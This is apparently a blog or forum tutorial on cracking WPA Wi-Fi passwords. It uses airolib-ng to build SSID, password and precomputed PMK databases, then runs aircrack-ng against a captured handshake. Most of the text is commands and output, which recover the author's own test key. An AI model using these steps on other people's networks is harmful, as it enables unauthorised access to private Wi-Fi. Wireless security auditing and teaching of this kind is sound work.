Note: I assume you already have a packet capture of a handshake.... If not just run airodump until you obtain a handshake, or for the sake of practice you can just turn your victim card on and off to catch a capture while airodump is running on that channel. I also assume you know the old way of cracking wpa.. If not I can post a guide on how to do that...
Setting up the databases:
First you need to create a SQLite3 database and import some SSID’s to the new database. If no database is already created then Airolib will create one for you automatically. Create a list of SSID’s from your Airodump output. Then use the Airolib command in the following format.
Create SSID list:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
does not already exist, creating it...
Next import your password list into the same database with the same format as when you added SSID’s to the database but replacing the keyword to passwd and adding your password list. Here is the format for this followed by an example.
Create Password List:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
This next command is an optional command called “clean” that will run integrity checks on the database and reduce the size of your database if possible.
root@ ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
Query done. 2 rows affected.
Create your PMK’s:
After you have imported all your SSID’s and Passwords you can create PMK hashes with the following command.
root@ ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.
Now that you have databases of PMK hashes for the WPA SSID’s in your area you can run a crack against your Output cap file to retrieve your password. If all goes well and the networks password is in your database you are done.
root@ ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Read 3347 packets.
# BSSID ESSID Encryption
1 00:18:F8:66:7E:CC ficti0nAP WPA (1 handshake)
Choosing first network as target.
Aircrack-ng 1.0 r1645
[00:00:00] 1 keys tested (240.91 k/s)
KEY FOUND! [ MyPassword ]
Master Key : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
Transient Key : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
EAPOL HMAC : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Another useful option if you want to crack all the WPA networks but you want to set the priority on a specific network you can run this sql command to set that priority in the database. Try the following command to set your network as a priority.
root@ficti0n:~# airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.